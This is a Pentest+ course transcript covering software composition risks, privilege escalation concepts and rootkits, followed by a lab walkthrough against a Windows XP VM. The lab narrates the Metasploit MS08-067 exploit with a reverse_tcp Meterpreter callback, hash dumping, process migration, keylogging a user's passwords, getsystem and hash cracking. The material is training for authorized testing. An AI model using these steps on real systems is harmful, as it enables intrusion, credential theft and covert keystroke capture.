CompTIA Pentest+ PT0-002 – Section 11: Application Vulnerabilities Part 4

108. Software Composition (OBJ 3.3)

In this lesson, we’re going to discuss Software Composition Analysis. Software Composition Analysis describes a process by which software can be analyzed for open-source components because these open-source components could contain vulnerabilities in their source code and those vulnerabilities will then be assumed by our applications when we use those components in our own web apps. If you or a vendor are going to build a piece of software that’s going to be publicly accessible, like a web app, you need to pay special attention to the risk associated with those applications. There is almost no applications these days that are written completely by your own developers or vendors. Instead, most developers are going to rely on third-party dependencies like library packages, JavaScript scripts, and CSS files. The problem with that is that even if your code is written extremely well from a security standpoint, if those third-party dependencies have a security flaw in them, you just inherited that flaw into your own application too. All code is going to be subject to the same types of vulnerabilities.

Things like cross-site scripting, cross-site request forgery, clickjacking, injection flaws, and many other different types of attacks. Yes, you can scan and protect your own code from these attacks but if you’re pulling in somebody else’s library, you also are going to be pulling in their vulnerabilities. For this reason, it’s important to track and monitor the common exposures and common vulnerability databases for those dependencies and open-source components that you’ve included in your applications. As the saying goes, “A vulnerability in a third-party dependency “becomes a vulnerability in your own application.” Nowhere was this more true than in the case of Equifax back in 2017 when they suffered a data breach that exposed the sensitive data of over 140 million American consumers. What was the root cause of that breach? Well, it was a vulnerability in an open-source framework that was used by Equifax when they developed their web application. The third-party code is actually called Apache Struts and it was a popular framework used to develop Java web applications. On March 7th of 2017, a major vulnerability was initially disclosed as CVE-2017-5638 that affected this popular framework. as CVE-2017-5638 that affected this popular framework. By March 9th, just two days later, the Equifax system administrators were informed that they needed to patch their systems because of this vulnerability. By March 15th, a week later, they still hadn’t patched those applications. And by this time, it was too late because attackers had already breached the systems using this well-documented vulnerability from the CVE.

Remember, whenever you or your vendors are using third-party dependencies or open-source components, you’re taking responsibility for the code you wrote and the code you didn’t write that you imported into your code base too. Now, to identify what libraries and components are used in a given piece of software, even when you didn’t write it, you can perform software composition analysis. There are many different automated ways of doing this, including using the OWASP’s dependency-check tool, which can scan a given piece of software to identify any publicly disclosed vulnerabilities in its project or its libraries. There’s also another helpful OWASP tool known as the dependency-track tool, which can provide even deeper insights into the source code and its libraries and components. I mentioned the Apache Struts framework earlier in this video when I discussed the Equifax breach as an example but it’s not the only framework used in software development. Other common frameworks include Microsoft .NET, Ruby on Rails, and Ramaze, which are both used for Ruby programming languages; Hibernate, which is a Java framework just like Apache Struts; and Django, Twisted and web.py, which are all used with the Python programming language.

These different frameworks are used to develop great applications by making things really simple for your developers. By using these frameworks, you can have reusable code that your developers can use instead of having to develop all code again from scratch. This saves us a lot of time and money during development but also, remember, you’re inheriting any vulnerabilities from those frameworks into your own code. So, you need to track and patch your own code whenever a new vulnerability is discovered in one of those frameworks. Another vulnerability in terms of software development is the use of unsafe functions. For example, if you’re coding something in the C programming language, there’s many well-documented vulnerabilities in the standard library, things like string copy, memory allocate, gets, string concatenate, and many others. To find these types of vulnerabilities, you need to conduct a static code analysis. And if you’re not the original developer or have access to the original source code, it can become very difficult for you to do identify these unsafe functions inside of that code.

Now, there’s a couple of other common vulnerabilities and software that we should talk about, including poor exception handling, security misconfigurations, weak cryptography implementations, information disclosures, End of Support or End of Life, code injections or malicious changes, and regression issues. First, we have poor exception handling. Poor exception handling occurs when a program is not written to anticipate problems or errors, and it doesn’t safely manage these issues in order to leave the application in a controlled state. This can lead to applications that crash or break in a way that leaves the system unstable or insecure. This could then be exploited by a threat actor to access restricted information or exploit an unprotected system. Second, we have security misconfigurations.

Now, security misconfigurations are a general term that talks about any issue that’s related to poorly implemented or documented security controls. For example, if a system uses a set of default configurations, settings or credentials, this could be considered a security misconfiguration. Similarly, if there are unpatched vulnerabilities or unprotected files, those could be put into the security misconfiguration category too. To prevent security misconfigurations, all systems should be hardened and all applications should be built using the best practices and secure coding techniques. Third, we have weak cryptography implementations. Now, weak cryptography implementations occur when an out-of-date algorithm or cipher is being used in a modern system. For example, if you find something that’s using DES, the Digital Encryption Standard these days, this is going to be considered a weak cryptography implementation because that encryption came out in the 1970s and it is really weak and should not be used today.

Similarly, if you’re using RC4 to encrypt your data in transit, this is a weak implementation. Both DES and RC4 are considered extremely weak ciphers and should never be used in any modern application. Similarly, you should never try to create your own proprietary encryption standard to protect your systems or applications. And instead, you should always utilize a well-known and well-documented encryption standard because it’s more likely to be secure and resistant to attack. Fourth, we have information disclosure. Information disclosure describes the active information being stolen from an application or during the communications process between two applications. Usually, information disclosure occurs because data is not being protected by some kind of encryption scheme, or they’re using a weak cipher, or it has a weak encryption key. If sensitive data is able to be read or processed by an unauthorized user, this is a form of information disclosure. Another form of information disclosure would occur if you have a data breach or a data leak.

Fifth, we have End of Support or End of Life issues. Now, End of Life indicates the period of time that a vendor will no longer sell or upgrade a particular piece of software or equipment. End of Support, instead, refers to the period of time that the vendor will stop creating new patches or updates for a particular piece of software or hardware. For example, Microsoft Windows 7 reached its End of Life in January 2015. At that point, Windows 7 stopped receiving new features and updates and mainstream support for the software was stopped but it was still not at its End of Support date, which occurred five years later in January 2020. At that point, Microsoft stopped providing all support, including any security patches. So, if a vulnerability was found in Windows 7 today, Microsoft has no obligation to create a security patch and deploy it to any systems that still use Windows 7 because that software is fully End of Life and End of Support. End of Life and End of Support dates are really important to consider when you’re determining if your software is vulnerable on your network. If the End of Life and End of Support date has been reached, you’re going to be unable to get vendor support and this leaves you very vulnerable. Before this happens, you should identify that date and have plans in place to upgrade your systems to a software that is well-supported by the vendor. Sixth, we have code injections or malicious changes. Now, a code injection is an exploitation technique that runs malicious code with identification of a legitimate process.

Code injection attacks allow the adversary to exploit an application and inject their own malicious code into that running application in order to perform their attack. Normally, code injections and malicious changes are the result of poor data handling or non-existent input/output validation methods. This is why it’s always important to ensure your applications provide good input validation and output validation in order to protect themselves from code injection attacks. Seventh, we have regression issues. Regression issues occur when a change to the source code is made usually in an attempt to add a new feature or patch a security vulnerability, and that change can introduce a new vulnerability or break some existing functionality.

For example, if I’m going to add a new feature to my website that allows students to retake their practice exams and only include questions they missed the first time, this new code could introduce a bunch of other bugs or break some existing functionality. This is because anytime you change something in your source code, you risk breaking something else. To prevent this, you need to use regression testing. Regression testing is focused on validating that any change to a piece of software does not produce an unintended consequence by testing all of your existing features again, your functionality, and your security in a very methodical way. Anytime your source code is accessed or changed, you should also ensure that it’s subject to change management and integrity controls to ensure the quality of your code remains high and security remains intact.

109. Privilege Escalation (OBJ 3.3)

In this lesson, we’re going to talk about the concepts of execution and escalation attacks. Now, when we talk about attacks against software code usually these attacks are going to attempt to execute some kind of attackers code within your system. And the way they do that is by exploiting some kind of a vulnerability. That’s the whole idea here. We’re going to talk about arbitrary code execution, remote code execution, privilege escalation, and rootkits. Now, when we talk about arbitrary code execution, this is a vulnerability that allows an attacker to run their own code or a module that exploits such a vulnerability. Now, essentially, they’re able to run what they want on your system without you stopping them. That’s what we mean by arbitrary code execution because they’re being able to run the things they want to run which is against what you want to run, and therefore, it’s arbitrary. Now, another thing we can look at is what’s known as remote code execution. Now remote code execution is like arbitrary code execution. In fact, it’s a type of that, but this is really a vulnerability that allows an attacker to transmit code from a remote host for execution on a target host or a module that exploits such a vulnerability. So if I can touch your machine and load up my software, that’s arbitrary code execution. If I can do it over the internet that’s remote code execution.

That’s the difference between these two. Now, the next thing we want to talk about is privilege escalation. Now we’ve mentioned the term privilege escalation earlier when we talked about threat hunting. One of the things bad guys want to do is they want to be able to operate at higher levels of privilege. And that’s what privilege escalation is all about. This is going to occur when a user accesses or modifies specific resources that they’re not entitled to normally access. So if I’m going to do a privilege escalation, what I’m trying to do is attempt to gain administrator or root-level permissions, that’s the holy grail for these folks. In fact, if they can get a domain admin, that’s even better. Now, when we talk about privilege escalation, we can really break this down into two types of escalation. The first is vertical privilege escalation. This is where somebody goes from a normal user and goes to a higher level.

So they’re going to go to an admin or a root-level. When you hear privilege escalation this is normally what most people think about. They think about a bad guy getting you to click a link in a spear phishing email, that then runs some kind of arbitrary code, that code then gives them escalated rights to be able to be the admin of that local system. That’s a vertical privilege escalation. Now, if we’re talking about the second type, this is known as horizontal privilege escalation. This occurs when a user accesses or modifies resources they’re not entitled to but it’s generally at the same level. So for example, if I’m on the share drive and I’m trying to access George’s file and I don’t have George’s permission, that would be horizontal privilege escalation. If I ran some kind of exploit that gave me permissions to run as a different user, such as George, even though he’s not an admin or a root, that’s why it’s considered horizontal. We both have user permissions at the same level, but he has permissions over his stuff, I have permissions over my stuff, so I might need to break into his account to be able to do that, and in that case, that would be a horizontal privilege escalation.

Now, why are privileges so important? Well it’s because every application or process has to have some kind of privileges to read and write data and execute those functions. Now, because those applications have permissions to run their functions and be able to execute functions and read and write data, if we are able to break into that application we can run things as that application as well. So for example, some applications and some system processes run using the system account. And so if I can break into that particular application and put some arbitrary code in there my code is now being run as system. And this allows me to do some sort of a hack or attack against that system. So whenever you’re running something and somebody’s able to put a code into it that arbitrary code is going to take the privileges of whoever was running that program. So if Jason’s running that program it has Jason’s permission. If the system was running that program it has the system permission. If an admin was running that program they have admin permissions. And so again, this is another way that privilege escalation can occur. Now, the last thing we want to talk about is rootkits.

A rootkit is essentially a class of malware that modifies system files often at the kernel level to conceal its presence. Now, when we’re dealing with a rootkit, this is something that is really scary for a lot of people. Why? Because when a rootkit gets into that system it can hide itself, they are very hard to detect. Now, a lot of times, once you have a rootkit installed, this means the attacker can now hide themself in your system. They can install other software like malware. They can create persistence between your computers, even if you start rebooting it or shutting it down. They can even maintain persistence between user log off events and other things like this. Now, when you’re dealing with rootkits you have to understand what are we talking about? Because there are different types of rootkits. Now, before we can get into the different types though, we really have to talk about the idea of rings and the way that systems are built. When we’re dealing with a computer there are multiple rings going from the most privileged to the least privileged. The ring zero is the center of the computer, this is the kernel, this is where the heart of the operating system lies. And this kernel can be a Windows kernel or a Linux kernel. If you’re operating something with kernel level permissions you’re at ring zero, you have the most privileged access to this machine. And so if I can get a rootkit that embeds itself into the kernel, that means I have ring zero access.

Now, if I have some kind of a rootkit that attaches itself to a device driver, that might be ring one or ring two, if it’s going after an application, it might be ring three. And the further out you are the less privileges you’re going to have. So let’s go back and look at our rootkits. What are the two types we have? Well, we have kernel mode and user mode. When we have a kernel mode rootkit, this is one that’s at that ring zero, it’s at the center, it has the most permissions. And so a kernel mode rootkit is able to gain complete control over your system.

Now, if somebody couldn’t get a kernel mode rootkit installed, they can only get a user one installed, this would be a user mode rootkit, and these might have administrator level privileges but they’re using OS features, the operating system features for persistence. So they have to be inside the registry. They have to be inside something like task scheduler. So that way, when you reboot the system they get that persistence back. So which one’s more dangerous, a kernel mode rootkit because it’s all the way down in ring zero. And therefore that’s going to be more dangerous for our systems.

110. Conducting Privilege Escalation (OBJ 3.3)

In this lesson, I’m going to teach you how to use the meterpreter payload and how to conduct privilege escalation. In this demonstration, I’m using a very vulnerable version of Windows, which is actually Windows XP which has long since been retired. But it makes a great machine to attack and practice on because it is so vulnerable. The techniques I’m going to show you will still work on modern systems like Windows 10 and Windows 11. You just have to use the right exploits to be able to get access to them and then use the Meterpreter payload from there. But for the purposes of our demonstration, we’re going to keep it Simple and use our calling machine to attack a Windows XP box. To get started, we need to open up our metaspoilt framework. From our metaspoilt framework, we’ll just type in use, exploit/Windows SMB Ms 08_067_netapi. Then we’re going to set our payload and we’re going to use the meterpreter payload which is Windows/meterpreter/reverse tcp. Now, at this point, we’re going to show our options and you’ll notice that we need to set our RHOST and our LHOST. So we’re going to set our RHOST for our Windows machine. In my case, the IP for that is .56.100 and then I’m going to set my LHOST to my calling machine which in my case is 56.102.

Then I will show my options one more time. And you’ll see at this point that I have my Windows machine IP as my RHOST. We’re going to be attacking port 445 with a netapi vulnerability. We’re going to use our payload of meterpreter and we’re going to have the callback go back to our calling machine on port 4444. And now at this point, we’re just going to type in exploit. And we now have an established connection where we’ve triggered the vulnerability in the Windows XP machine and it is called back to us with stage two.

And we have that connection from the Windows machine here to our calling machine here. So now we’re at the meterpreter prompt, so what do we want to do? Well, the first thing I want to do is I want to know what process I am. So I’m going to type in getpid. And it tells me that I’m process 980. So to understand what that is, I’m going to type in PS which is going to list all of the running processes on the Windows machine. So as you can see, process 980 is right here. It’s the service host process. And that is actually the system level user NT authority/system.

So right now we already have system level rights on this machine. So there’s no need to escalate our privileges. But if if we were a lower level user, we would have to escalate our privileges up. So I’m going to show you some techniques for doing that as well. The reason why we are a system level user in this case is because the exploit we’re doing is the service host and the service host is always run as system. Now, if instead we use something like a spear phishing campaign, we would end up being brought in as that user who probably doesn’t have admin rights and we’d have to work our way up. And we can still run a lot of the same processes like the hashdumps and password cracking to start from there and migrate upward. So now that we see what process we’re in let’s go ahead and see what system ID we have.

So we’ll just type in getsid. And you’ll notice that it says we are S-1-5-18. Now anything under 500 is going to be a system level type process. Whether that’s going to be something like the local service or the system itself. Now, once we get into users they start out at 1000 and go above. If you’re the administrator, that’s a 500 level account. So this last dash number here is going to tell us a lot about what type of process that is and what type of user we are. So now that we’re here, let’s go ahead and do a hash dump and we’ll see what other users are on the system. So here we go, we have the administrator account again and that’s that sid 500. We have a guest, which is sid 501. We have the help assistant starts at 1000. The John Sim user is user 1003. And then we have the support account, which is 1002. So what I’m going to do is I’m just going to copy all of this text here, and we’re going to put it into a text file and we’re going to save that to our desktop.

And to do, do that I’m just going to open a turmoil here. I’m going to type in G edit, which is a graphical text editor and we can just paste that in. And then we’re going to go ahead and save it to the desktop so we’ll know where it is and we’ll just call that hashdump. And at this point we can close that out and we can close out that one. So now we have a text file with that information, so we can use that in our password cracking. Now, before we get to that, I’m going to still play with meterpreter a little bit more here first and show you some other things. We can do a migration from one process to another and that should change us into that user. So for instance, right now we are in process 980, which is NT authority system.

If I started running things as system like the notepad that would look suspicious, but if I did it as John Sim it wouldn’t. So I’m going to go ahead and change myself into this one right here, which is process 1248. And that should change me into John Sim, who has a Sid of 1003. So what we’re going to do is just type in migrate and the pid we want to go to which in this case is 1248. So migrate to 1248, and you’ll see that migrating from 980 to 1248, it takes a couple of seconds and now we should be loaded into that process. It says we’re complete. So let’s getpid and make sure that we are in the process we wanted.

So getpid, we verify that we are in 1248. And so now if I do PS, you can see that 1248 is a process owned by John Sim. So let’s get our Sid and verify that. It should tell us that we’re Sid 1003, because that’s John Sim’s sid. And in this case, we do have Sid 1003, which is John Sim. So that’s how you can migrate from one user to another and one process to another. Now, why else might you want to migrate processes? If the process I’m sitting in crashes, I’m going to lose my access. So if I break in, I’m going to want to migrate to something more stable and more hidden, such as the service host or the services.exe or explore.exe, because they’re a lot more stable and they don’t crash as often. Now, the other thing to note is why might I want to go to a user that’s not system or admin, like in this case, John Sim’s a regular user.

Why would I want to migrate into him? Well, one of the reasons why I might want to do that is if I wanted to do key logging. So if I wanted to key log John Sim, I have to be logged in as John Sim. And so in this case, I now am John Sim. So I can start my key logger and capture those keystrokes. I’ll go ahead and show that to you now, because again this is another way to escalate our privileges. If John happens to have admin rights and he’s on his user account daily, and then types in his password to elevate into an admin status, the key installed a new printer or something like that, we’d be able to capture that password. Let me bring up the key logger commands here just to remind us. So we’ll go up here to help and we have our key scan start, key scan stop.

And again, our key scan dump to get those key strokes. So let’s go ahead and start it by doing key scan start. So if I go here and do a key scan start, and now John Sim is on his machine, and let’s say he was opening up a notepad and typing in his passwords. Here’s my email address and my password of password. And then he decides, you know that’s really not a secure way to save my passwords. I’m going to go ahead and delete those. So he just gets rid of that, never had any evidence. Well, we happen to capture it because we were capturing his keystrokes. And so right here, you can see he pressed return. He did password list, hit return, typed in that, hit return and then password. So why might this be useful? Well, if I had my key scanner going the whole time and I’m capturing all this data, I can capture his side of all conversations. All his instant messages, all his emails, all his user and passwords. All this information is stuff that I can use to elevate my permissions and spread laterally into other systems. So I might now have his user and passwords for his banking, his Facebook, his Twitter all of that stuff, because we captured all those keystrokes. It’s pretty cool technique.

So now going back to our escalating privileges we’re still sitting here as John Sim as the user. So the next thing we want to look at is migrating back to system and we’ll go ahead and do that. We’ll just do a PS so we can figure out what process we want to go to. And we can go ahead and migrate ourself into 980 again just like we were before and go back to system and we’ll just migrate 980. Again, that’s going to move us back. And at this point we should now be the system level user. So we’ll do that getpid, we’re in 980, getsid, we’re back to the system level user, which is that -18. One other thing, I’ll show you.

We’re going to go back to John Sim here one more time ’cause I forgot to show this to you. We’ll go back to his pid, which was 1248. So now we’re back here. You can see that we are user 1003. Again, that’s John Sim. Another way to get system is actually using the command get system and it’s part of meterpreter. And so if you just type in get system, it will go ahead and move and get you system level access. So now if I get my Sid, I am back here as the system level. Now let’s see what process it put us in. We’re still in John’s process, but we are the system user now.

So that’s something else that you can look at here. It’s an interesting technique and it works most of the time. So if we look up here in the process list, you’ll see that there’s this local service account for instance, this isn’t even a user account. This is below user. All it does is local services, and this is happens to be for the sound drivers in my system. Now you also have this network services. These processes have such low, low access, you can’t migrate back into John or back into system because you’re too low a level at that point. The only way to break back into this is actually to exit out of the system and then re exploit the system.

So be careful where you jump into, because if you have system or domain level rights and you go down to a standard user to do something like a keystroke depending on that user’s level of access you can actually get yourself stuck in that user and you’re going to be done at that point. And that’s why being able to have their password to be able log in as them is very important. And that’s where our hashdump came in. So if you remember, we had run the hashdump command and we got all of these hashes. And so what I ended up doing with them is I put them in this text file. So what we’re going to do is we’re going to use a program called Johnny. So under applications, we’ll go into password attacks and click on Johnny.

Now from Johnny, we’re going to open a password file. And the file we’re going to open is on our desktop and it’s called hashdump. That was the file that we put in the text. Now, as we go through it immediately starts and it starts going through the attack for us. It’s going to try to crack any of the passwords it can find based on the hashes. And so here you see administrators already cracked as password and it’s working on John Sim. So far, it doesn’t know what the first part is but it got the last two letters which is H-O. Now, this is doing a brute force attack. So this can take a long time as it tries to crack things, if they’re not real words. So in the case of John Sim, this actually says Dr. Who. So the first part of it is going to be doctor with a w at the end. That’s not a real word, so it’s going to take a long time for it to go through and do its cracking. Now, something that would be a lot quicker is for us to go to something like CrackStation on the internet. And so let’s go ahead and I’ll show you how that works with John Sim here. So when we created our calling machine, we didn’t allow copy and pasting from calling back to our desktop environment. So I’m going to have to actually type that in.

So it’s dcc3ae5197aa40cc477a180ba53335e6. And then we’re going to go ahead and put in the code over here which is diesel lion is what it looks like. And then crack the hash. And you’ll see how quickly it’s going to come back with CrackStation. Comes back immediately. And it gives us lots of different choices of what it thinks it could be based on the fact that we have that particular hash. Now, why are there multiple things that it could be based on this hash? So the reason why we have this duplication is there’s actually repetition in the hash tables. One of the reasons for that is that LM hashes only support 14 characters.

Anything over 14 characters, what it does is it breaks them in half. Seven letters and seven letters, hashes each part, and then goes again. So in our case, you’ll see the fact that we have this doctorWoodland, doctorWhoWebguide, doctorWhoWebguide. And if you hash any of these, it goes back to the same hash. Now, what this tell us, because now we’re like, oh, which one do we choose? Well, if we go back to our Jack the ripper, if you remember we ended up having, if we count the letters, D-O-C-T-O-R-W, that is the first seven. And notice that all of these first seven are the same, Doctorw. So that’s going to give us the first seven letters guaranteed. Well, the nice thing was we had found the last two letters was H-O, so we could figure out now it’s Doctorwho, Doctor Who. And then we can use that as the password to get in.

• Category: Uncategorized